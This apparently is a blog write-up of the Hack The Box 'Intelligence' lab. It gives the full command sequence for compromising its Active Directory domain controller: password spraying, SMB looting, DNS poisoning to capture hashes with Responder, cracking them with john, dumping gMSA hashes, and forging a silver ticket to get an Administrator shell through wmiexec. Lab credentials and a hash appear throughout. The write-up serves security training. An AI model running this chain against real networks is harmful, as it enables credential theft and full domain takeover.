Hack_The_Box_Writeups

HackTheBox – Intelligence

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A -v -T4 -Pn 10.10.10.248

┌──(rootkali)-[/home/kali/Downloads]

└─# echo 10.10.10.248 dc.intelligence.htb intelligence.htb > /etc/hosts

http://intelligence.htb/

http://intelligence.htb/documents/2020-01-01-upload.pdf

http://intelligence.htb/documents/2020-12-15-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]

└─# wget http://intelligence.htb/documents/2020-01-01-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]

─# wget http://intelligence.htb/documents/2020-12-15-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]

└─# exiftool 2020-01-01-upload.pdf

┌──(rootkali)-[/home/kali/Downloads]

└─# exiftool 2020-12-15-upload.pdf

Now we have two potential usernames. Let’s see if they are “AS-REP Roastable”:

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -usersfile users.txt -dc-ip 10.10.10.248 -no-pass intelligence.htb/

https://github.com/ropnop/kerbrute

┌──(rootkali)-[/home/kali/Downloads]

└─# kerbrute -dc-ip 10.10.10.248 -domain intelligence.htb -users users.txt

They are valid, but we have reached a dead end.

Finding more files and usernames

Looking at the PDF filenames (2020-01-01-upload.pdf and 2020-12-15-upload.pdf), we can guess that maybe there are more files stored in the webserver with the same naming convention (namely, YYYY-MM-DD-upload.pdf).

In order to try all possible files within the year 2020, I decided to use a Go script called reqPdf.go, which will make all the requests and download the found files in less than a second:

https://github.com/7Rocky/HackTheBox-scripts/tree/main/Machines/Intelligence#reqPdfgo

┌──(rootkali)-[/home/kali/Downloads]

└─# cat reqPdf.go

┌──(rootkali)-[/home/kali/Downloads]

└─# go run reqPdf.go

┌──(rootkali)-[/home/kali/Downloads]

└─# exiftool *.pdf | grep Creator | awk ‘{ print $3 }’ | sort -u | tee users.txt

┌──(rootkali)-[/home/kali/Downloads]

└─# kerbrute -dc-ip 10.10.10.248 -domain intelligence.htb -users users.txt

password of: NewIntelligenceCorpUser9876

──(rootkali)-[/home/kali/Downloads]

└─# crackmapexec smb 10.10.10.248 -u users.txt -p ‘NewIntelligenceCorpUser9876’

We get the username:

intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

┌──(rootkali)-[/home/kali/Downloads]

└─# crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 –shares

┌──(rootkali)-[/home/kali/Downloads]

└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 -r Users

┌──(rootkali)-[/home/kali/Downloads]

└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 –download ‘Users\Tiffany.Molina\Desktop\user.txt’

┌──(rootkali)-[/home/kali/Downloads]

└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 -r IT

┌──(rootkali)-[/home/kali/Downloads]

└─# smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H 10.10.10.248 –download ‘IT\downdetector.ps1’

┌──(rootkali)-[/home/kali/Downloads]

└─# responder -I tun0 –wrf

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/dirkjanm/krbrelayx.git

┌──(rootkali)-[/home/kali/Downloads]

└─# cd krbrelayx 

┌──(rootkali)-[/home/kali/Downloads/krbrelayx]

└─# ls

┌──(rootkali)-[/home/kali/Downloads/krbrelayx]

└─# python3 dnstool.py -u ‘intelligence.htb\Tiffany.Molina’ -p ‘NewIntelligenceCorpUser9876’ -a add -r ‘weboops.intelligence.htb’ -d 10.10.14.12 10.10.10.248

Now we our record in DNS so let’s wait for hash in responder. Note this may take up to 5 mins so be patient.

┌──(rootkali)-[/home/kali/Downloads]

└─# cat hash

┌──(rootkali)-[/home/kali/Downloads]

└─# john hash –wordlist=rockyou.txt

Password: Mr.Teddy

username = Ted.Graves

password = Mr.Teddy

┌──(rootkali)-[/home/kali/Downloads]

└─# crackmapexec smb 10.10.10.248 -u Ted.Graves -p ‘Mr.Teddy’

┌──(rootkali)-[/home/kali/Downloads/BloodHound.py]

└─# bloodhound-python -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc dc.intelligence.htb -ns 10.10.10.248 –dns-timeout 60 -w 1

┌──(rootkali)-[/home/kali/Downloads/BloodHound.py]

└─# neo4j console

Reset the password from here.

┌──(rootkali)-[/home/kali/Downloads/krbrelayx]

└─# bloodhound

As it is shown above, Ted.Graves belongs to ITSupport group. And the members of this group have the privilege to get the password of svc_int$, which is a group managed service account (gMSA). Using gMSADumper, we can obtain the NTLM hash of this service account:

https://github.com/micahvandeusen/gMSADumper

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/micahvandeusen/gMSADumper.git

┌──(rootkali)-[/home/kali/Downloads/gMSADumper]

└─# python3 gMSADumper.py -u ‘Ted.Graves’ -p ‘Mr.Teddy’ -d ‘intelligence.htb’ -l ‘dc.intelligence.htb’

Now that we have the NTLM hash of, it’s time to perform a Silver Ticket attack. As in every Kerberos attack, first we must synchronize with the server (using ntpdate or rdate):

┌──(rootkali)-[/home/kali/Downloads]

└─# ntpdate 10.10.10.248

And now we can obtain a Silver Ticket to impersonate Administrator using Impacket’s getST.py specifying the hash of svc_int$

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 /usr/share/doc/python3-impacket/examples/getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator -dc-ip 10.10.10.248 -hashes :b98d4cef68f72a98dfeed732d1b1abca intelligence.htb/svc_int$

┌──(rootkali)-[/home/kali/Downloads]

└─# export KRB5CCNAME=Administrator.ccache

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -k -no-pass -dc-ip 10.10.10.248 intelligence.htb/Administrator@dc.intelligence.htb

C:\>whoami

C:\>type C:\Users\Administrator\Desktop\root.txt

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *